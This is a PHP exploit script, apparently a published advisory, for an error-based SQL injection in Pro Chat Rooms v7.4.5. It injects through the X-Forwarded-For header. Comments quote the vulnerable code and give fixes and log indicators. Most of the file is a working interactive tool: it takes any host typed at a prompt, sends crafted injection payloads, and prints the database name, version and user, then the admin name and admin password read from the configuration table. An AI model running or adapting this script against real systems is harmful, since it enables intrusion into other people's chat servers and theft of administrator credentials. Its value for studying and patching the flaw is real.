
Pro Chat Rooms v7.4.5 Error Based Sql Injection

Author: DzKabyle , Published: 16-07-2014
<?

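/*

Vulnerable code path, quoted from the application. getIP() returns the
client-supplied X-Forwarded-For value as-is, and updateGuestAvatar() places it
in the UPDATE statement without escaping (unlike avatar and username, which go
through makeSafe()). Fix: accept the value only if it is a valid IP address
(e.g. filter_var() with FILTER_VALIDATE_IP), bind it as a query parameter, and
do not return mysql_error() output to the client.

../include/function.php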

function getIP()
{
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];

if ($ip == '')
{
$ip = $_SERVER['REMOTE_ADDR'];
}

return $ip;
}

../include/function.php

function updateGuestAvatar($loginGender)
{

// update watching, webcam, avatar
$sql = "UPDATE prochatrooms_users
SET avatar = '".makeSafe($loginGender)."', userIP = '".getIP()."', guest = '".$_SESSION['guest']."'
WHERE username = '".makeSafe($_SESSION['username'])."'";
mysql_query($sql)
or die(mysql_error());

}

../index.php

if($_POST['isGuest'])
{
updateGuestAvatar($_REQUEST['genderID']);
}

*/

// Banner: product and version the advisory applies to, plus author credit.
print implode('', array(
    "\n+-------------------------------------------------------------------------+",
    "\n| Pro Chat Rooms v7.4.5 Error Based Sql Injection |",
    "\n| dzkabyle (www.sec4ever.com) |",
    "\n+-------------------------------------------------------------------------+\n\n\n",
));



/**
 * Send one guest-login POST to <host>/index.php with $pay carried in request
 * headers, and return the response body split on the "<:>" marker.
 *
 * Why this request reaches the flaw (per the application code quoted at the
 * top of this file): index.php calls updateGuestAvatar() when isGuest is
 * posted, and that function concatenates getIP() -- which reads
 * $_SERVER['HTTP_X_FORWARDED_FOR'] -- into an UPDATE statement unescaped.
 *
 * Detection: the forwarded-for value in such a request is not an IP address.
 * The fixed User-Agent string and the fixed form values below
 * (userName=dds, roomID=1341399832) are log indicators for this exact script.
 *
 * @param string $url  Host as typed by the operator; replace() strips the scheme.
 * @param string $pay  Value placed in the REMOTE_ADDR and X_FORWARDED_FOR headers.
 * @return array       Pieces of the response body as returned by ex().
 */
function dzkabyle($url,$pay){
// Guest login form fields; isGuest=1 is what triggers updateGuestAvatar() in the quoted index.php.
$post="login=1&isGuest=1&userName=dds&userPass=&roomID=1341399832&langID=1&genderID=1&newLogin.x=0&newLogin.y=0";
$dzkabyle = curl_init();
// The scheme is always forced to plain http, whatever the operator typed.
curl_setopt($dzkabyle, CURLOPT_URL, "http://".replace($url)."/index.php");
curl_setopt($dzkabyle, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)");

// Same value sent under two header names; the quoted getIP() only consults the forwarded-for one first.
curl_setopt($dzkabyle, CURLOPT_HTTPHEADER, array("REMOTE_ADDR: $pay", "X_FORWARDED_FOR: $pay"));
curl_setopt($dzkabyle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($dzkabyle, CURLOPT_POST, 1);
curl_setopt($dzkabyle, CURLOPT_POSTFIELDS, $post);
curl_setopt($dzkabyle, CURLOPT_COOKIEFILE, "dz.txt");
curl_setopt($dzkabyle, CURLOPT_COOKIEJAR, "/");
// The body is returned to the caller only because the application prints the database error text.
return $result = ex(curl_exec($dzkabyle));

// NOTE(review): unreachable -- the return above exits first, so the handle is never closed explicitly.
curl_close($dzkabyle);

}


/**
 * Issue four requests through dzkabyle() and echo what each one discloses:
 * database name, server version, database user, and two columns (admin,
 * adminLogin) from the prochatrooms_config row with id=1.
 *
 * The payloads are error-based: the selected value is wrapped in 0x3c3a3e
 * ("<:>") markers and comes back inside the database error message, which the
 * quoted updateGuestAvatar() sends to the client via die(mysql_error()).
 *
 * Defensive takeaways: parameterize the UPDATE, stop echoing mysql_error() to
 * clients (log it server-side instead), and treat the values read from
 * prochatrooms_config as exposed on any installation that ran this version
 * unpatched -- rotate them after fixing.
 *
 * @param string $t  Target host as typed by the operator.
 * @return void      Nothing is returned; results are written with echo.
 */
function exploit($t){
// Template payload; the literal HERE is substituted per request below.
$database="1' and(select 1 from(select count(*),concat((select (select concat(0x3c3a3e,HERE,0x3c3a3e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1";



// Index 1 of each result is the text between the first pair of "<:>" markers.
$db=dzkabyle($t,str_ireplace("HERE","database()",$database));
echo "database : ".$db[1]." \n";

$tb=dzkabyle($t,str_ireplace("HERE","version()",$database));
echo "Version : ".$tb[1]." \n";

$user=dzkabyle($t,str_ireplace("HERE","user()",$database));
echo "USER : ".$user[1]." \n";

// Second payload reads the admin and adminLogin columns of prochatrooms_config (id=1), capped at 150 characters.
$table="1' And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(0x3c3a3e,admin,0x3c3a3e,adminLogin,0x3c3a3e),1,150)from prochatrooms_config where id=1 limit 0,1),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z) and '1'='1";

$ab=dzkabyle($t,$table);

// $ab[1] is the admin column and $ab[2] the adminLogin column, in the order selected above.
echo "admin name : ".$ab[1]." \n";
echo "admin passowrd : ".$ab[2]."\n";


}


/**
 * Split a response body on the "<:>" marker.
 *
 * @param string $ur  Text to split.
 * @return array      The pieces in order; a single-element array when the marker is absent.
 */
function ex($ur){
    return explode("<:>", $ur);
}
/**
 * Remove every "http://" and "https://" occurrence (case-insensitive) from a string.
 *
 * @param string $ur  URL or host as typed.
 * @return string     The input with both scheme prefixes removed.
 */
function replace($ur){
    // Array form applies the two removals in the listed order, one after the other.
    return str_ireplace(array("http://", "https://"), '', $ur);
}

// Interactive driver: prompt for a host on STDIN until the operator types "bye".
for (;;) {
    print "Your URL @ : ";
    $fa = trim(fgets(STDIN));
    if ($fa == "bye") {
        exit("\n+ Exiting");
    }
    // exploit() echoes its findings and has no return statement, so only blank lines are printed here.
    $response = exploit($fa);
    print "\n".$response."\n";
}






?>
